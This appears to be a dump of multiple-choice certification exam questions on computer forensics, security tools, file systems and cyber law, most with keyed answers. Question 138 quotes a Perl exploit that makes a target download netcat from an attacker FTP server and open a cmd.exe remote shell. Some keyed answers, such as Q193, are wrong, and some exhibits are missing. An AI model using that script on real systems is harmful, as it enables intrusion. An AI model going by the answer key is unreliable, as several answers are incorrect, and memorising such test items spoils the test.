NEW QUESTION: 108 Peter works as a Computer Hacking Forensic Investigator. He has been called by an organization to conduct a seminar to give necessary information related to sexual harassment within the work place. Peter started with the definition and types of sexual harassment. He then wants to convey that it is important that records of the sexual harassment incidents should be maintained, which helps in further legal prosecution. Which of the following data should be recorded in this documentation? Each correct answer represents a complete solution. Choose all that apply. A. Nature of harassment B. Names of the victims C. Date and time of incident D. Location of each incident Answer: B,C,D (LEAVE A REPLY)

NEW QUESTION: 109 You work as a Network Administrator for Web World Inc. You want to host an e-commerce Web site on your network. You want to ensure that storage of credit card information is secure. Which of the following conditions should be met to accomplish this? Each correct answer represents a complete solution. Choose all that apply. A. NT authentication should be required for all customers before they provide their credit card numbers. B. Only authorized access should be allowed to credit card information. C. The NTFS file system should be implemented on a client computer. D. Strong encryption software should be used to store credit card information. Answer: B,D (LEAVE A REPLY)

NEW QUESTION: 110 You use the FAT16 file system on your Windows 98 computer. You want to upgrade to the FAT32 file system. What is the advantage of the FAT32 file system over FAT16 file system? Each correct answer represents a complete solution. Choose two. A. It uses larger cluster sizes. B. It supports drives up to 2 terabytes (TB) in size. C. On startup failure, you can start the computer by using an MS-DOS or Windows 95 bootable floppy disk. D. It allocates disk space more efficiently. Answer: B,D (LEAVE A REPLY)

NEW QUESTION: 111 You want to perform passive footprinting against we-are-secure Inc. Web server. Which of the following tools will you use? A. Ethereal B. Ettercap C. Netcraft D. Nmap Answer: (SHOW ANSWER)

NEW QUESTION: 112 Which of the following tools is used to block email, Instant Message, Web site, or other media if inappropriate words such as pornography, violence, etc. are used? A. iProtect B. iProtectYou C. Child Exploitation Tracking System D. Reveal Answer: (SHOW ANSWER)

NEW QUESTION: 113 Adam works as a Computer Hacking Forensic Investigator for a garment company in the United States. A project has been assigned to him to investigate a case of a disloyal employee who is suspected of stealing design of the garments, which belongs to the company and selling those garments of the same design under different brand name. Adam investigated that the company does not have any policy related to the copy of design of the garments. He also investigated that the trademark under which the employee is selling the garments is almost identical to the original trademark of the company. On the grounds of which of the following laws can the employee be prosecuted? A. Cyber law B. Trademark law C. Espionage law D. Copyright law Answer: B (LEAVE A REPLY)

NEW QUESTION: 114 Mark is the Administrator of a Linux computer. He wants to check the status of failed Telnet-based login attempts on the Linux computer. Which of the following shell commands will he use to accomplish the task? A. CP B. GREP C. CAT D. FSCK Answer: (SHOW ANSWER)

NEW QUESTION: 115 You want to retrieve information whether your system is in promiscuous mode or not. Which of the following commands will you use? Each correct answer represents a complete solution. Choose all that apply. A. ifconfig | grep PROMISC B. show promisc C. ip link D. grep Promisc /var/log/messages Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 116 Which of the following registry hives contains information about all users who have logged on to the system? A. HKEY_CLASSES_ROOT B. HKEY_USERS C. HKEY_CURRENT_CONFIG D. HKEY_CURRENT_USERS Answer: B (LEAVE A REPLY)

NEW QUESTION: 117 Peter works as a Security Administrator for SecureEnet Inc. He observes that the database server of the company has been compromised and the data is stolen. Peter immediately wants to report this crime to the law enforcement authorities. Which of the following organizations looks after the computer crimes investigations in the United States? A. Federal Bureau of Investigation B. Local or National office of the US secret service C. National Institute of Standards and Technology D. Incident response team Answer: B (LEAVE A REPLY)

NEW QUESTION: 118 Which of the following is a name, symbol, or slogan with which a product is identified? A. Copyright B. Patent C. Trade secret D. Trademark Answer: D (LEAVE A REPLY)

NEW QUESTION: 119 You work as a Network Administrator for Net World International. You want to configure a Windows 2000 computer to dual boot with Windows 98. The hard disk drive of the computer will be configured as a single partition drive. Which of the following file systems will you use to accomplish this? A. NTFS B. FAT32 C. HPFS D. FAT16 Answer: B (LEAVE A REPLY)

NEW QUESTION: 120 Which of the following can be monitored by using the host intrusion detection system (HIDS)? Each correct answer represents a complete solution. Choose two. A. Storage space on computers B. File system integrity C. System files D. Computer performance Answer: B,C (LEAVE A REPLY)

NEW QUESTION: 121 You are the Security Consultant working with a client who uses a lot of outdated systems. Many of their clients PC's still have Windows 98. You are concerned about the security of passwords on a Windows 98 machine. What algorithm is used in Windows 98 to hash passwords? A. SHA B. LANMAN C. MD5 D. DES Answer: B (LEAVE A REPLY)


NEW QUESTION: 122 John works as a Network Administrator for DigiNet Inc. He wants to investigate failed logon attempts to a network. He uses Log Parser to detail out the failed logons over a specific time frame. He uses the following commands and query to list all failed logons on a specific date:

logparser.exe file:FailedLogons.sql -i:EVT -o:datagrid

SELECT timegenerated AS LogonTime, extract_token(strings, 0, '|') AS UserName
FROM Security
WHERE EventID IN (529; 530; 531; 532; 533; 534; 535; 537; 539)
AND to_string(timegenerated,'yyyy-MM-dd HH:mm:ss') like '2004-09%'

After investigation, John concludes that two logon attempts were made by using an expired account. Which of the following EventID refers to this failed logon? A. 534 B. 532 C. 531 D. 529 Answer: B (LEAVE A REPLY)

NEW QUESTION: 123 John, a novice web user, makes a new E-mail account and keeps his password as "apple", his favorite fruit. John's password is vulnerable to which of the following password cracking attacks? Each correct answer represents a complete solution. Choose all that apply. A. Rule based attack B. Hybrid attack C. Dictionary attack D. Brute Force attack Answer: (SHOW ANSWER)

NEW QUESTION: 124 Allen works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a computer, which is used by the suspect to sexually harass the victim using instant messenger program. Suspect's computer runs on Windows operating system. Allen wants to recover password from instant messenger program, which suspect is using, to collect the evidence of the crime. Allen is using Helix Live for this purpose. Which of the following utilities of Helix will he use to accomplish the task? A. MessenPass B. Access PassView C. Asterisk Logger D. Mail Pass View Answer: (SHOW ANSWER)

NEW QUESTION: 125 Convention on Cybercrime, created by the Council of Europe, is the treaty seeking to address Computer crime and Internet crimes by harmonizing national laws, improving investigative techniques, and increasing cooperation among nations. Which of the following chapters of Convention of Cybercrime contains the provisions for mutual assistances and extradition rules related to cybercrimes? A. Chapter I B. Chapter III C. Chapter IV D. Chapter II Answer: B (LEAVE A REPLY)

NEW QUESTION: 126 John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He receives the following e-mail:

The e-mail that John has received is an example of ______. A. Spambots B. Chain letters C. Virus hoaxes D. Social engineering attacks Answer: B (LEAVE A REPLY)

NEW QUESTION: 127 You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to run a command that forces all the unwritten blocks in the buffer cache to be written to the disk. Which of the following Unix commands can you use to accomplish the task? A. sync B. tune2fs C. swapon D. swapoff Answer: A (LEAVE A REPLY)

NEW QUESTION: 128 Which of the following file systems is used by both CD and DVD? A. (UDF) B. New Technology File System (NTFS) C. Compact Disk File System (CDFS) D. Network File System (NFS) Answer: A (LEAVE A REPLY)

NEW QUESTION: 129 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate an iPhone, which has been seized from a criminal. The local police suspect that this iPhone contains some sensitive information. Adam knows that the storage of the iPhone is divided into two partitions. The first partition is used for the operating system. Other data of the iPhone is stored in the second partition. Which of the following is the name with which the second partition is mounted on the iPhone? A. /private/var B. /var/private C. /var/data D. /data/var Answer: A (LEAVE A REPLY)

NEW QUESTION: 130 Which of the following types of firewall functions at the Session layer of OSI model? A. Circuit-level firewall B. Packet filtering firewall C. Switch-level firewall D. Application-level firewall Answer: A (LEAVE A REPLY)

NEW QUESTION: 131 You work as a Network Administrator for Perfect Solutions Inc. You have to install Windows 2000 on a computer that will work as a file server. You have to format the hard disk of the computer, using a file system that supports encryption. Which of the following file systems will you use to accomplish this? A. FAT32 B. FAT16 C. NTFS D. HPFS Answer: C (LEAVE A REPLY)

NEW QUESTION: 132 Which of the following firewalls depends on the three-way handshake of the TCP protocol? A. Proxy-based firewall B. Stateful firewall C. Endian firewall D. Packet filter firewall Answer: B (LEAVE A REPLY)

NEW QUESTION: 133 John works as a professional Ethical Hacker. He has been assigned the task of testing the security of www.we-are-secure.com. He has performed the footprinting step and now he has enough information to begin scanning in order to detect active computers. He sends a ping request to a computer using ICMP type 13. What kind of ICMP message is John using to send the ICMP ping request message? A. Echo request B. Address mask request C. Information request (obsolete) D. Timestamp request (obsolete) Answer: D (LEAVE A REPLY)

NEW QUESTION: 134 Which of the following modules of OS X kernel (XNU) provides the primary system program interface? A. I/O Toolkit B. BSD C. Mach D. LIBKERN Answer: B (LEAVE A REPLY)

NEW QUESTION: 135 Which of the following enables an inventor to legally enforce his right to exclude others from using his invention? A. Phishing B. Artistic license C. Patent D. Spam Answer: C (LEAVE A REPLY)

NEW QUESTION: 136 Which of the following tools is used to modify registry permissions in Windows? A. REGEDT32 B. SECEDIT C. REGEDIT D. POLEDIT Answer: A (LEAVE A REPLY)


NEW QUESTION: 137 Which of the following commands can you use to create an ext3 file system? Each correct answer represents a complete solution. Choose two. A. mkfs.ext3 B. mkfs.ext2 C. mke2fs D. mke2fs -j Answer: A,D (LEAVE A REPLY)

NEW QUESTION: 138 Adam, a malicious hacker, performs an exploit, which is given below:

#################################################################
$port = 53; # Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = '[email protected]';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ... \n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished ... (Have a ftp server)\n";
$o=<STDIN>;
print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port");
exit(0);

Which of the following is the expected result of the above exploit? A. Creates a share called "sasfile" on the target system B. Opens up a SMTP server that requires no username or password C. Opens up a telnet listener that requires no username or password D. Creates an FTP server with write permissions enabled Answer: (SHOW ANSWER)

NEW QUESTION: 139 John works as a professional Ethical Hacker. He is assigned a project to test the security of www.we-are-secure.com. He is working on the Linux operating system. He wants to sniff the we-are-secure network and intercept a conversation between two employees of the company through session hijacking. Which of the following tools will John use to accomplish the task? A. Hunt B. IPChains C. Tripwire D. Ethercap Answer: A (LEAVE A REPLY)

NEW QUESTION: 140 Which of the following switches is used with Pslist command on the command line to show the statistics for all active threads on the system, grouping these threads with their owning process? A. Pslist -m B. Pslist -x C. Pslist -d D. Pslist -t Answer: C (LEAVE A REPLY)

NEW QUESTION: 141 Which of the following needs to be documented to preserve evidences for presentation in court? A. Separation of duties B. Chain of custody C. Incident response policy D. Account lockout policy Answer: B (LEAVE A REPLY)

NEW QUESTION: 142 Joseph works as a Software Developer for WebTech Inc. He wants to protect the algorithms and the techniques of programming that he uses in developing an application. Which of the following laws are used to protect a part of software? A. Patent laws B. Trademark laws C. Copyright laws D. Code Security law Answer: A (LEAVE A REPLY)

NEW QUESTION: 143 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate the BlackBerry, which is suspected to be used to hide some important information. Which of the following is the first step taken to preserve the information in forensic investigation of the BlackBerry? A. Turn off the BlackBerry. B. Remove the storage media. C. Eliminate the ability of the device to receive the push data. D. Keep BlackBerry in 'ON' state. Answer: C (LEAVE A REPLY)

NEW QUESTION: 144 Adam works as a Computer Hacking Forensic Investigator. He has been assigned a project to investigate child pornography. As the first step, Adam found that the accused is using a Peer-to-peer application to network different computers together over the internet and sharing pornographic materials of children with others. Which of the following are Peer-to-Peer applications? Each correct answer represents a complete solution. Choose all that apply. A. Kismet B. Hamachi C. Gnutella D. Freenet Answer: (SHOW ANSWER)

NEW QUESTION: 145 Which of the following are the primary goals of the incident handling team? Each correct answer represents a complete solution. Choose all that apply. A. Prevent any further damage. B. Repair any damage caused by an incident. C. Inform higher authorities. D. Freeze the scene. Answer: (SHOW ANSWER)

NEW QUESTION: 146 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a compromised system of a cyber criminal, who hides some information in his computer. This computer runs on Linux operating system. Adam wants to extract the data units of a file, which is specified by its meta-data address. He is using the Sleuth Kit for this purpose. Which of the following commands in the Sleuth kit will he use to accomplish the task? A. icat B. dcat C. ifind D. istat Answer: (SHOW ANSWER)

NEW QUESTION: 147 Which of the following functionality within the Autopsy browser is specifically designed to aid in case management? A. Image integrity B. Keyword searches C. File listing D. Hash database Answer: (SHOW ANSWER)

NEW QUESTION: 148 Which of the following is the correct order of loading system files into the main memory of the system, when the computer is running on Microsoft's Windows XP operating system? A. NTLDR, BOOT.ini, NTDETECT.com, HAL.dll, NTOSKRNL.exe B. BOOT.ini, HAL.dll, NTDETECT.com, NTLDR, NTOSKRNL.exe C. NTLDR, BOOT.ini, HAL.dll, NTDETECT.com, NTOSKRNL.exe D. NTLDR, BOOT.ini, HAL.dll, NTDETECT.com, NTOSKRNL.exe Answer: (SHOW ANSWER)

NEW QUESTION: 149 You are responsible for all computer security at your company. This includes initial investigation into alleged unauthorized activity. Which of the following are possible results of improperly gathering forensic evidence in an alleged computer crime by an employee? Each correct answer represents a complete solution. Choose three. A. Your company is unable to pursue the case against a perpetrator. B. You are charged with criminal acts. C. Your company is sued for defaming the character of an accused party. D. You falsely accuse an innocent employee. Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 150 Which of the following evidences are the collection of facts that, when considered together, can be used to infer a conclusion about the malicious activity/person? A. Incontrovertible B. Direct C. Circumstantial D. Corroborating Answer: (SHOW ANSWER)

NEW QUESTION: 151 You want to upgrade a partition in your computer's hard disk drive from FAT to NTFS. Which of the following DOS commands will you use to accomplish this? A. SYS C: B. FDISK /mbr C. FORMAT C: /s D. CONVERT C: /fs: Answer: D (LEAVE A REPLY)


NEW QUESTION: 152 Which of the following methods can be used to start the Disk Defragmenter utility in Windows 9x? Each correct answer represents a complete solution. Choose two. A. From Start menu > Programs > Accessories > System Tools, click Disk Defragmenter. B. From Start menu > Programs, click Disk Defragmenter. C. From Start menu > Programs > Windows Explorer, right-click on the drive to be defragmented, then click the Disk Defragmenter in the popup window. D. From Start menu > Programs > Windows Explorer, right-click on the drive to be defragmented > click Properties in the popup menu > Tools tab, then click the Defragment Now button. Answer: (SHOW ANSWER)

NEW QUESTION: 153 John works as a professional Ethical Hacker. He has been assigned a project for testing the security of www.we-are-secure.com. He wants to corrupt an IDS signature database so that performing attacks on the server is made easy and he can observe the flaws in the We-are-secure server. To perform his task, he first sends a virus that continuously changes its signature to avoid detection by the IDS. Since the new signature of the virus does not match the old signature, which is entered in the IDS signature database, the IDS becomes unable to point out the malicious virus. Which of the following IDS evasion attacks is John performing? A. Polymorphic shell code attack B. Evasion attack C. Session splicing attack D. Insertion attack Answer: A

NEW QUESTION: 154 In 2001, the Council of Europe passed a convention on cybercrime. It was the first international treaty seeking to address computer crime and Internet crimes by harmonizing national laws, improving investigative techniques, and increasing cooperation among nations. On 1 March 2006, the Additional Protocol to the Convention on Cybercrime came into force. Which of the following statements clearly describes this protocol? A. English speaking states in Europe such as Ireland and the United Kingdom should sign the convention. B. The convention of cybercrime should immediately be put on hold until there is an inclusion of a new or amended article. C. The convention of cybercrime is only applied within Europe. D. It requires participating states to criminalize the dissemination of racist and xenophobic material through computer systems. Answer: D

NEW QUESTION: 155 A firewall is a combination of hardware and software, used to provide security to a network. It is used to protect an internal network or intranet against unauthorized access from the Internet or other outside networks. It restricts inbound and outbound access and can analyze all traffic between an internal network and the Internet. Users can configure a firewall to pass or block packets from specific IP addresses and ports. Which of the following tools works as a firewall for the Linux 2.4 kernel? A. IPChains B. OpenSSH C. Stunnel D. IPTables Answer: D

NEW QUESTION: 156 Based on the case study, to implement more security, which of the following additional technologies should you implement for laptop computers? (Click the Exhibit button on the toolbar to see the case study.) Each correct answer represents a complete solution. Choose two. A. PAP authentication B. Digital certificates C. Two-factor authentication D. Encrypting File System (EFS) E. Encrypted Data Transmissions Answer: B,D

NEW QUESTION: 157 Adam works as a professional Computer Hacking Forensic Investigator with the local police of his area. A project has been assigned to him to investigate a PDA seized from a local drug dealer. It is expected that much valuable and important information is stored in this PDA. Adam follows investigative methods that must be performed in a pre-defined sequence for the successful forensic investigation of the PDA. Which of the following is the correct order in which to perform a forensic investigation of a PDA? A. Examination, Collection, Identification, Documentation B. Documentation, Examination, Identification, Collection C. Examination, Identification, Collection, Documentation D. Identification, Collection, Examination, Documentation Answer: C

NEW QUESTION: 158 Which of the following types of firewall ensures that the packets are part of the established session? A. Stateful inspection firewall B. Application-level firewall C. Switch-level firewall D. Circuit-level firewall Answer: A

NEW QUESTION: 159 Which of the following methods is used by forensic investigators to acquire an image over the network in a secure manner? A. DOS boot disk B. Secure Authentication for EnCase (SAFE) C. EnCase with a hardware write blocker D. Linux Live CD Answer: B

NEW QUESTION: 160 Nathan works as a Computer Hacking Forensic Investigator for SecureEnet Inc. He uses Visual TimeAnalyzer software to track all computer usage by logging into individual users' accounts or specific projects and to compile detailed accounts of time spent within each program. Which of the following functions are NOT performed by Visual TimeAnalyzer? Each correct answer represents a complete solution. Choose all that apply. A. It gives parents control over their children's use of the personal computer. B. It monitors all user data such as passwords and personal documents. C. It tracks work time, pauses, projects, costs, software, and internet usage. D. It records specific keystrokes and runs screen captures as a background process. Answer: B,D

NEW QUESTION: 161 Your company suspects an employee of sending unauthorized emails to competitors. These emails are alleged to contain confidential company data. Which of the following is the most important step for you to take in preserving the chain of custody? A. Make copies of that employee's email. B. Seize the employee's PC. C. Preserve the email server including all logs. D. Place spyware on the employee's PC to confirm these activities. Answer: C

NEW QUESTION: 162 Which of the following files contains the salted passwords in the Linux operating system? A. /etc/shadow B. /etc/passwd C. /bin/shadow D. /bin/passwd Answer: A

NEW QUESTION: 163 Which of the following attacks saturates network resources and disrupts services to a specific computer? A. Replay attack B. Denial-of-Service (DoS) attack C. Polymorphic shell code attack D. Teardrop attack Answer: B

NEW QUESTION: 164 You work as a professional Computer Hacking Forensic Investigator. A project has been assigned to you to investigate plagiarism that occurred in C# source code files. Which of the following tools will you use to detect the software plagiarism? A. Turnitin B. SCAM C. Jplag D. VAST Answer: C

NEW QUESTION: 165 Your Windows XP hard drive has 2 partitions. The system partition is NTFS and the other is FAT. You wish to encrypt a folder created on the system partition for the purpose of data security. Which of the following statements is true about this situation? A. You can only encrypt files on the FAT partition. B. Since the operating system is on the NTFS partition, you can encrypt files on both. C. You cannot encrypt files on either partition. D. You can only encrypt files on the NTFS partition. Answer: D

NEW QUESTION: 166 You are the Security Consultant and have been hired to check security for a client's network. Your client has stated that he has many concerns but the most critical is the security of Web applications on their Web server. What should be your highest priority then in checking his network? A. Setting up IDS B. Setting up a honey pot C. Vulnerability scanning D. Port scanning Answer: C

NEW QUESTION: 167 You work as a Network Administrator for a bank. For securing the bank's network, you configure a firewall and an IDS. In spite of these security measures, intruders are able to attack the network. After a close investigation, you find that your IDS is not configured properly and hence is unable to generate alarms when needed. What type of response is the IDS giving? A. True Positive B. False Positive C. True Negative D. False Negative Answer: (SHOW ANSWER)

NEW QUESTION: 168 John is a black hat hacker. The FBI arrested him while he was performing some email scams. Under which of the following US laws will John be charged? A. 18 U.S.C. 2510 B. 18 U.S.C. 2701 C. 18 U.S.C. 1030 D. 18 U.S.C. 1362 Answer: (SHOW ANSWER)

NEW QUESTION: 169 Adam works as an Incident Handler for Umbrella Inc. He is informed by the senior authorities that the server of the marketing department has been affected by a malicious hacking attack. Supervisors also claim that some sensitive data has been stolen. Adam immediately went to the server room of the marketing department and identified the event as an incident. He isolated the infected network from the remaining part of the network and started preparing to image the entire system. He captures volatile data, such as running processes, RAM, and network connections. Which of the following steps of the incident handling process is being performed by Adam? A. Eradication B. Identification C. Recovery D. Containment Answer: D

NEW QUESTION: 170 You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to fix partitions on a hard drive. Which of the following Unix commands can you use to accomplish the task? A. fsck B. exportfs C. fdformat D. fdisk Answer: D

NEW QUESTION: 171 Which of the following is a documentation of guidelines that computer forensics experts use to handle evidences? A. Chain of custody B. Incident response policy C. Chain of evidence D. Evidence access policy Answer: A

NEW QUESTION: 172 Which of the following Acts enacted in United States amends Civil Rights Act of 1964, providing technical changes affecting the length of time allowed to challenge unlawful seniority provisions, to sue the federal government for discrimination and to bring age discrimination claims? A. PROTECT Act B. Civil Rights Act of 1991 C. Sexual Predators Act D. The USA Patriot Act of 2001 Answer: B

NEW QUESTION: 173 You are working with a team that will be bringing in new computers to a sales department at a company. The sales team would like to keep not only their old files, but system settings as well on the new PCs. What should you do? A. Do a system backup (complete) on each old machine, then restore it onto the new machines. B. Use the User State Migration tool to move the system settings and files to the new machines. C. Copy the files and the Windows Registry to a removable media then copy it onto the new machines. D. Use the Disk Management tool to move everything to the new computer. Answer: B

NEW QUESTION: 174 Which of the following two cryptography methods are used by NTFS Encrypting File System (EFS) to encrypt the data stored on a disk on a file-by-file basis? A. Twofish B. Public key C. Digital certificates D. RSA Answer: B,C

NEW QUESTION: 175 You work as a Network Administrator for Blue Bell Inc. You want to install Windows XP Professional on your computer, which already has Windows Me installed. You want to configure your computer to dual boot between Windows Me and Windows XP Professional. You have a single 40GB hard disk. Which of the following file systems will you choose to dual-boot between the two operating systems? A. NTFS B. FAT32 C. CDFS D. FAT Answer: B

NEW QUESTION: 176 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a multimedia enabled mobile phone, which is suspected to be used in a cyber crime. Adam uses a tool, with the help of which he can recover deleted text messages, photos, and call logs of the mobile phone. Which of the following tools is Adam using? A. FTK Imager B. Device Seizure C. FAU D. Galleta Answer: B

NEW QUESTION: 177 You are the Network Administrator and your company has recently implemented encryption for all emails. You want to check to make sure that the email packages are being encrypted. What tool would you use to accomplish this? A. Vulnerability analyzer B. Password cracker C. Performance Monitor D. Packet sniffer Answer: (SHOW ANSWER)

NEW QUESTION: 178 On your dual booting computer, you want to set Windows 98 as the default operating system at startup. In which file will you define this? A. NTBOOTDD.SYS B. NTDETECT.COM C. BOOTSECT.DOS D. BOOT.INI Answer: D

NEW QUESTION: 179 Which of the following tools works by using a standard set of MS-DOS commands and can create an MD5 hash of an entire drive, partition, or selected files? A. Device Seizure B. DriveSpy C. Forensic Sorter D. Ontrack Answer: (SHOW ANSWER)

NEW QUESTION: 180 You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network. You are configuring a wireless LAN on the network. You experience interference on your network. Through investigation, you come to know that three foreign WAPs are within the range of your LAN. Although they have different SSIDs than yours, they are working on the same channel as yours. Which of the following steps will you take to reduce the interference? A. Install an external antenna. B. Install a router on your network. C. Configure the same SSID as of the foreign networks. D. Change your WAP's channel. Answer: (SHOW ANSWER)

NEW QUESTION: 181 By gaining full control of a router, hackers often acquire full control of the network. Which of the following methods are commonly used to attack routers? Each correct answer represents a complete solution. Choose all that apply. A. By launching Max Age attack B. By launching Social Engineering attack C. Route table poisoning D. By launching Sequence++ attack Answer: A,C,D

NEW QUESTION: 182 Which of the following is NOT an example of passive footprinting? A. Querying the search engine. B. Performing the whois query. C. Scanning ports. D. Analyzing job requirements. Answer: C

NEW QUESTION: 183 Which of the following are the benefits of information classification for an organization? Each correct answer represents a complete solution. Choose two. A. It helps identify which information is the most sensitive or vital to an organization. B. It helps identify which protections apply to which information. C. It helps reduce the Total Cost of Ownership (TCO). D. It ensures that modifications are not made to data by unauthorized personnel or processes. Answer: (SHOW ANSWER)

NEW QUESTION: 184 Which of the following is a set of exclusive rights granted by a state to an inventor or his assignee for a fixed period of time in exchange for the disclosure of an invention? A. Copyright B. Utility model C. Patent D. Snooping Answer: (SHOW ANSWER)

NEW QUESTION: 185 Which of the following representatives of incident response team takes forensic backups of the systems that are the focus of the incident? A. Lead investigator B. Legal representative C. Technical representative D. Information security representative Answer: (SHOW ANSWER)

NEW QUESTION: 186 In a Windows 98 computer, which of the following utilities is used to convert a FAT16 partition to FAT32? A. CONVERT16.EXE B. CONVERT.EXE C. CVT16.EXE D. CVT1.EXE Answer: (SHOW ANSWER)

NEW QUESTION: 187 You work as a Forensic Investigator. Which of the following rules will you follow while working on a case? Each correct answer represents a part of the solution. Choose all that apply. A. Examine original evidence and never rely on the duplicate evidence. B. Prepare a chain of custody and handle the evidence carefully. C. Never exceed the knowledge base of the forensic investigation. D. Follow the rules of evidence and never tamper with the evidence. Answer: A,B,C,D

NEW QUESTION: 188 In Linux, which of the following files describes the processes that are started up during boot up? A. /etc/shadow B. /etc/passwd C. /etc/inittab D. /etc/profile Answer: C

NEW QUESTION: 189 You are responsible for tech support at your company. You have been instructed to make certain that all desktops support file and folder encryption. Which file system should you use when installing Windows XP? A. NTFS B. FAT32 C. FAT D. EXT4 Answer: A

NEW QUESTION: 190 Which of the following is a password-cracking program? A. SubSeven B. Netcat C. L0phtcrack D. NetSphere Answer: C

NEW QUESTION: 191 Which of the following sections of United States Economic Espionage Act of 1996 criminalizes the misappropriation of trade secrets related to or included in a product that is produced for or placed in interstate commerce, with the knowledge or intent that the misappropriation will injure the owner of the trade secret? A. Title 18, U.S.C. 1831 B. Title 18, U.S.C. 1832 C. Title 18, U.S.C. 1834 D. Title 18, U.S.C. 1839 Answer: B

NEW QUESTION: 192 Which of the following file systems supports the hot fixing feature? A. exFAT B. FAT16 C. FAT32 D. NTFS Answer: D

NEW QUESTION: 193 Which of the following Windows XP system files handles memory management, I/O operations, and interrupts? A. Ntoskrnl.exe B. Win32k.sys C. Kernel32.dll D. Advapi32.dll Answer: C

NEW QUESTION: 194 Adam works as a professional Computer Hacking Forensic Investigator. He has been assigned a project to investigate a computer in the network of SecureEnet Inc. The compromised system runs on the Windows operating system. Adam decides to use Helix Live for Windows to gather data and electronic evidence, starting with retrieving volatile data and transferring it to the server component via TCP/IP. Which of the following application software in Helix Windows Live will he use to retrieve volatile data and transfer it to the server component via TCP/IP? A. FTK imager B. FAU C. FSP D. Drive Manager Answer: C

NEW QUESTION: 195 Which of the following is the first computer virus that was used to infect the boot sector of storage media formatted with the DOS (FAT) file system? A. Melissa B. I love you C. Brain D. Tequila Answer: C

NEW QUESTION: 196 Which of the following switches of the XCOPY command copies file ownerships and NTFS permissions on files while copying the files? A. /p B. /r C. /s D. /o Answer: (SHOW ANSWER)

NEW QUESTION: 197 John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He copies the whole structure of the We-are-secure Web site to the local disk and obtains all the files on the Web site. Which of the following techniques is he using to accomplish his task? A. Web ripping B. Fingerprinting C. TCP FTP proxy scanning D. Eavesdropping Answer: (SHOW ANSWER)

NEW QUESTION: 198 You work as a Network Administrator for Net World International. You have configured the hard disk drive of your computer as shown in the image below:

The computer is configured to dual-boot with Windows 2000 Server and Windows 98. While working on Windows 2000 Server, you save a file on the 6GB partition. You are unable to find the file while working on Windows 98. You are not even able to access the partition on which the file is saved. What is the most likely cause? A. Windows 98 does not support the NTFS file system. B. The file is corrupt. C. Files saved in Windows 98 are not supported by Windows 2000. D. The 6GB partition is corrupt. Answer: A

NEW QUESTION: 199 Which of the following statements about the compression feature of the NTFS file system are true? Each correct answer represents a complete solution. Choose two. A. It supports compression only on volumes. B. Compressed files on an NTFS volume can be read and written by any Windows-based application after they are decompressed. C. It supports compression on volumes, folders, and files. D. Users can work with NTFS-compressed files without decompressing them. Answer: C,D

NEW QUESTION: 200 Which of the following statements about the HKEY_LOCAL_MACHINE registry hive is true? A. It contains configuration data for the current hardware profile. B. It contains information about the local computer system, including hardware and operating system data, such as bus type, system memory, device drivers, and startup control parameters. C. It contains the user profile for the user who is currently logged on to the computer. D. It contains data that associates file types with programs and configuration data for COM objects, Visual Basic programs, or other automation. Answer: (SHOW ANSWER)

NEW QUESTION: 201 Which of the following describes software technologies that improve portability, manageability, and compatibility of applications by encapsulating them from the underlying operating system on which they are executed? A. System registry B. Group Policy C. System control D. Application virtualization Answer: (SHOW ANSWER)

NEW QUESTION: 202 You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to allow direct access to the filesystems data structure. Which of the following Unix commands can you use to accomplish the task? A. dosfsck B. df C. du D. debugfs Answer: (SHOW ANSWER)

NEW QUESTION: 203 Which of the following is a type of intruder detection that involves logging network events to a file for an administrator to review later? A. Active detection B. Packet detection C. Event detection D. Passive detection Answer: D

NEW QUESTION: 204 You work as a Network Administrator for NetTech Inc. The company's network is connected to the Internet. For security, you want to restrict unauthorized access to the network with minimum administrative effort. You want to implement a hardware-based solution. What will you do to accomplish this? A. Connect a router to the network. B. Connect a brouter to the network. C. Implement a proxy server on the network. D. Implement a firewall on the network. Answer: D

NEW QUESTION: 205 John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He has successfully completed the following pre-attack phases while testing the security of the server: Footprinting, Scanning. Now he wants to conduct the enumeration phase. Which of the following tools can John use to conduct it? Each correct answer represents a complete solution. Choose all that apply. A. PsFile B. PsPasswd C. UserInfo D. WinSSLMiM Answer: (SHOW ANSWER)

NEW QUESTION: 206 Which of the following statements about registry is true? Each correct answer represents a complete solution. Choose three. A. It can be edited using SCANREG utility. B. It is a centralized configuration database that stores information related to a Windows computer. C. It is divided in many areas known as hives. D. It was first introduced with Windows 95 operating system. Answer: B,C,D

NEW QUESTION: 207 Which of the following are advantages of NTFS file system over FAT32 and FAT? Each correct answer represents a part of the solution. Choose two. A. Support for audio files. B. Support for file and folder level permissions. C. Support for Encrypting File System (EFS). D. Support for dual-booting. Answer: B,C

